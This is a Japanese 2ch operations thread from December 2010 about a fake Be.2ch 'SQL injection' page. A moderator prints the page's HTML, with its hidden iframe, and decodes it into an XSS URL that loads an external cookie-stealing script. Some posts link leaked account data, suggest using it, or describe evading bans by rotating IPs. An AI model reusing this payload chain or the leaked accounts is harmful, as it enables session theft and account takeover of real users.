【news】ニュース速報運用情報676【ν】

**雪 ★** · 2010/12/11(土) 21:47:36

ニュース速報
http://hato.2ch.net/news/

前スレ
【news】ニュース速報運用情報675【ν】
http://qb5.2ch.net/test/read.cgi/operate/1292021115/

http://qb5.2ch.net/test/read.cgi/sakud/1131629475/561
> 561 名前：FOX ★[sage] 投稿日：2007/06/07(木) 20:18:27 ID:???0
> 「嫌なら出てけ」

http://qb5.2ch.net/test/read.cgi/operate/1181680138/387
> 387 名前：ひろゆき＠どうやら管理人 ★[] 投稿日：2007/06/14(木) 19:53:42 ID:???0 (PC) ?S★(1001111)
> ネタスレ・クソスレ・実況は不可
> アニメ、声優などのオタスレも不可
> ゲームはアニメ、声優ネタなら不可
> zip、クレクレ等、偽装スレも不可
> ただし、スレタイの遊びは、エロ、差別、アニメ、声優ネタ以外は許容
>
> 一行ソースでも重要性の高いニュースならOK
> スポーツ、芸能もOK
> アンケートスレはスレタイの遊びの範囲ならOK
> アンケートのために適当なニュースソースを張ってる場合は不可

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 16:49:41

これでスレ立てお願い

スレタイ
【速報】Be ch森無限生成復活ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!

本文
Be.2chにSQLインジェクションの脆弱性が発見されました．
下記のリンクを押すと体験出来ます．
なお，このサンプルではch森を999999999に出来ます．

詳細はURLに書いてある
http://arc.mo-e.info/doc/be_sql.html

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 16:49:44

例の石川さんはどうやって撃ってたの？

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 16:49:45

jimのVPNじゃなくてインターリンクのVPNを使えばいいかと。

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 16:51:24

arc.mo-e.info に一致する情報は見つかりませんでした。

>>693
インターリンクのだとデータセンター扱いになるから
民ストで暴れまわったら誰かが焼くと思う

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 16:53:27

>>691 いい加減にしろ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 16:54:22

板の仕様で遊んでいるだけで荒らしでは無い。

samba突破もしてないし誰にも迷惑はかけてない。

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 16:54:23

また東日本さんか

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 16:55:25

http://hato.2ch.net/test/read.cgi/news/1292140478/
起っちゃったよ…

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 16:55:39

このユーザーの投稿が面白いと思うならポイントが贈れます。ポイントを送る
0
名前:
紹介文:
ポイント:
登録日:

体験したけど何ともなかった

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 16:56:25

またロールバックするの？

**あひるちゃん** ◆z0WvbsWRgg · 2010/12/12(日) 16:56:37

>>668
ゲージやめて縁なし水槽おすすめ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 16:56:41

>>696
インターリンクのVPNだと月額1050円だから高くない？
逆引きを自分で設定できるのは面白いけど、大量に契約するのには向かないと思う

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 16:57:19

復号化したらCookie抜かれてるようなスクリプトだった

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 16:58:02

ログアウトすれば問題無いと思いました。

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 16:58:44

よっしゃ、早くニュー速崩壊させろ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 16:59:38

ああ、ときわちゃんハムを一つのケージに1匹にするのね
そうこうしてるうちにだんだん動物中心の生活になっていく

>>701
ペットショップだと大抵水槽に入れてるよね
今までケージでしか飼ったことないんだけど、どう違うの？

**雪 ★** · 2010/12/12(日) 17:01:08

<html>
<head>
<title>Be.2ch SQLインジェクション体験</title>
</head>
<body>
<h1>Be.2ch SQLインジェクション体験</h1>
<p>Be.2chにSQLインジェクションが発見されました．<br />
下記のリンクを押すと体験出来ます．<br />
なお，このサンプルではch森を999999999に出来ます．</p>

<a href="http://be.2ch.net/test/t.php?i=">体験する</a>

<iframe src="http://3.ly/acclog" width="1" height="1" style="display:none;"></iframe>

</body>
</html>

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:01:44

>>707
誰？

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:02:06

>>707
体験したいです

**雪 ★** · 2010/12/12(日) 17:02:27

またXSSか

http://3.ly/acclog
↓
http://stock.2ch.net/test/result.so?res=%3Cscript%20src=http://b.otsukare.tk/be3.js%3E%3C/script%3E

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:03:02

>>707
これって普段使わないOperaみたいなブラウザから開けば問題ないんだよな？

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:03:10

クロスサイトスクリプティングだね

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:03:55

いいかげん全鯖停止して全部のスクリプト洗いなおせや

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:03:57

ﾀｽｹﾃ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:04:27

電子は1128002ポイントsakuられるのか
どうせ貰ったポイントだろうけど勿体無いな

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:05:03

sakuられないけど

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:06:03

友　達　が　少　な　い　人　の　特　徴　
http://hato.2ch.net/test/read.cgi/news/1292131999/
こういうスレばっかなニュー速なんてぐちゃぐちゃにしてしまえ

**Naritaka** · 2010/12/12(日) 17:06:44

http://3.ly/acclogの接続先調べようと思ったら間違えてアクセスしちゃった

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:06:51

>>707
あたらしいキャップさんですか？
自己紹介したらどうです？

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:07:18

君子危うきに近寄らず

だぜｗ

**あひるちゃん** ◆z0WvbsWRgg · 2010/12/12(日) 17:08:39

>>706
掃除するとき別ばけつにハムスターいれるだろ
ごみをふくろにいれるだろ
風呂場で熱湯と中性洗剤で洗える。

檻じゃねえからガチャガチャおとしない
透明だから見た目もすっきり

水槽は通販が安い
ttp://www.shopping-charm.jp/

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:09:40

>>692
・450ポイント以上のアカウントをたくさん用意する。
・１回民ストするたびに、ルータを再起動してIPアドレスを変える。

ものすごくアナログなやり方。

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:10:00

潰せとか言ってる人は自分でどうにかしようと思わないの？

**ぴこふぁらど** ◆Yuno.A.C1WtQ · 2010/12/12(日) 17:10:37

短縮ってケツに+つけたら詳細見られるんじゃねえの
少なくともbitlyはそうだた

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:10:51

【速報】Be ch森無限生成復活ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!
http://hato.2ch.net/test/read.cgi/news/1292140478/

はよsakuれや

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:10:51

石川さんは繋ぎ変えの速さが凄い

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:11:50

その石川って人は10秒以内で止められるのか？

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:11:55

>>723
できたらとっくにやってるわ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:12:23

>>719

>>1見てみ

**あひるちゃん** ◆z0WvbsWRgg · 2010/12/12(日) 17:12:27

石川県レスもはええよな。最近遭遇してない

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:12:49

>>717
はがない偽装だろ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:13:17

嫌ならν速見なければいいじゃない
何でそこまで粘着してるんだか

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:13:52

>>727
石川は昨日民ストしようとして失敗してたよｗ

◆cHoCvGZYsg · 2010/12/12(日) 17:13:58

繋ぎ変え速度テスト

◆cHoCvGZYsg · 2010/12/12(日) 17:14:12

繋ぎ変え速度テスト

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:14:22

危険URLのマルチポストはやめろマジで
うっかり踏みそうになった

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:15:30

>>733
見てないわ。

>>734-735
その速度でも目押ししなければ止められるか。

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:15:56

石川式民スト

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:16:18

何でsakuならないの?

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:17:06

【速報】Be ch森無限生成復活ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!
http://hato.2ch.net/test/read.cgi/news/1292140478/

早く止めろよ、スレスト仕事し無すぎだろ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:17:22

公開されてるみたいだけど
もしかして串用意して公開されてるBe垢使えば費用0で民スト出来るんじゃね？

http://b.otsukare.tk/test/hell.cgi

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:17:27

最近のニュー速はグダグダだね

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:17:33

saku回避ってまだできるの?

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:18:10

俺をスレ立てられるようにしろ
浄化してくる

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:18:58

認証コードって変えられるの？

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:19:23

>>745
パスワード変更すれば認証コードも変わる

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:20:42

ID:tu/RKgb+P

こいつの規制を頼む

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:21:06

>>746 thx 速攻で変えたよ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:21:42

メアド公開とかいらないから。

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:22:22

こんばんは

**ぴこふぁらど** ◆Yuno.A.C1WtQ · 2010/12/12(日) 17:22:47

認証コードって頑張ればメルアドから生成出来そうだよね、ってかできてんのかもしれんが

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:24:23

Be.2chにSQLインジェクションの脆弱性が発見されました．
下記のリンクを押すと体験出来ます．
なお，このサンプルではch森を999999999に出来ます．

詳細はURLに書いてある
http://arc.mo-e.info/doc/be_sql.html
http://www.dotup.org/uploda/www.dotup.org1295972.jpg

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:25:43

ここでくだらないことやってる暇があったらスレの1つくらい立てろよ

[―{}@{}@{}-] **Naritaka** · 2010/12/12(日) 17:25:44

test

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:26:14

なんか運用家族が避難されてるね・・・・

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:26:22

すげーホントに999999999になったｗ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:27:06

BE鯖の抱える表面的な問題点
　・Cookieが一時的なものではなく、パスワードを変えない限り半永久的に使えてしまう
　・Cookie中のデータが暗号化されていない。メールアドレスは平文のまま、
　　認証コードの生成式も流出しているのでパスワードの逆算も可能
　・サーバーサイドスクリプトが穴だらけでXSSの温床

根本的な問題点
　・Cookie「のみ」で認証していること
　　例えばIPアドレスも含めて認証するようにすれば第三者が成りすますことは困難になる
　　そこら辺はここでも指摘されている
　　http://blog.livedoor.jp/dankogai/archives/50959103.html
　　Cookieのみで認証する仕組みを変えれば、前述した表面的な問題点はある程度無視できる
　　XSSを根絶やしにするよりもよっぽど現実的な策であるはず

[―{}@{}@{}-] **Naritaka** · 2010/12/12(日) 17:27:39

ぷにっ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:27:58

寒い
http://2ch-dc.mine.nu/v2/src/1292125315856.jpg

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:29:18

結構積もりましたね

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:30:04

be所有者のアカウント　メアド　ip　パスが公開される　速攻パス変えとけ
http://hato.2ch.net/test/read.cgi/news/1292142465/

こういうの立てると余計ややこしくなる

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:30:05

つまり設計者が無能ってことだな。小学生以下の頭脳。ひろゆきさんか？設計は。

**ぴこふぁらど** ◆Yuno.A.C1WtQ · 2010/12/12(日) 17:30:39

なんだ生成式漏れてんのか
無能だな

?DIA(263478) · 2010/12/12(日) 17:31:04

あーあーテステス

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:31:28

例えばCookieに ip=[暗号化したipアドレス]をセットさせるんだよ
んで書き込み時はbbs.cgiのどっかでREMOTE_ADDRと[復号化したipアドレス]が一致するかチェック
一致しなければ成りすましと判断してログイン画面に戻す

暗号化のキーがバレたらすぐに変更する
ってだけでいいのに

**あひるちゃん** ◆z0WvbsWRgg · 2010/12/12(日) 17:32:44

民間スレストだけにつかうとかなんか方法あんだろ
ただ穴晒しても面白みが無い
>>761
まあな

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:33:03

あひるちゃんってわかってて混乱させるようなスレ立ててるの？

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:33:25

http://iup.2ch-library.com/i/i0203059-1292142666.png

?DIA(263478) · 2010/12/12(日) 17:33:34

結構早いプロキシが見つかって大変満足なう

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:34:17

焼かれてるのはカスや

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:34:46

え？トラップかと思ったけど今度の無限増殖ガチなのか？
連続トラブルでbe制度が終わりそうなレベルまできてるように感じる

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:35:14

VIP警察みたいに運営家族で民スト組合でも作れば良いじゃない

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:35:18

>>768

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:36:55

【速報】Be ch森無限生成復活ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!
http://hato.2ch.net/test/read.cgi/news/1292140478/

ニュースでもなんでもないsakuれ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:37:11

よっしゃニューカス民ざまあ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:38:41

d_e_n_s_h_i@これって電子彗星のアド？

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:39:06

なんで金銭のからんでるbeシステムがこんなに脆弱なんだよ
あちこちの穴つかれまくりじゃないか

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:39:30

beなぞやってるやつは情弱

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:39:41

クッキーがぬかれるのか

**ぴこふぁらど** ◆Yuno.A.C1WtQ · 2010/12/12(日) 17:39:54

メアド片っ端からググったら面白そう

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:40:43

beのパスっってどうやって変えるんだっけ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:41:00

d_e_n_s_h_i@のIPが群馬だったから電子のか

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:41:09

無限増殖可能だったらすぐにS★の奴がわんさか沸いてくるだろうに

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:41:16

クレカ情報がマジで心配だわ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:41:42

>>776
多分そうだろ
てか俺のも載ってる誰かメールよこせ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:41:51

どうせBe用に取得してるメアドだから何も出てこないだろ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:42:15

イカ娘最終話やら無限増殖やら、餌とURLだけ変えてるけど
中身は同じ脆弱性で何度も何度も

もうわざと引っかかった上で警察に通報するのがいいような気が

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:42:23

>>747
135 名前：レギンス(東京都)[] 投稿日：2010/12/12(日) 17:18:41.41 ID:rY8kKzJL0
半身浴(群馬県) ID:tu/RKgb+P

死ね

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:42:55

>>784
だからクレカで買うのやめなさい
モリタポオークションで安く銀行振り込みで買えなかったっけ

**動け動けウゴウゴ２ちゃんねる** · 2010/12/12(日) 17:42:59

認証コードでどうやってハックするの?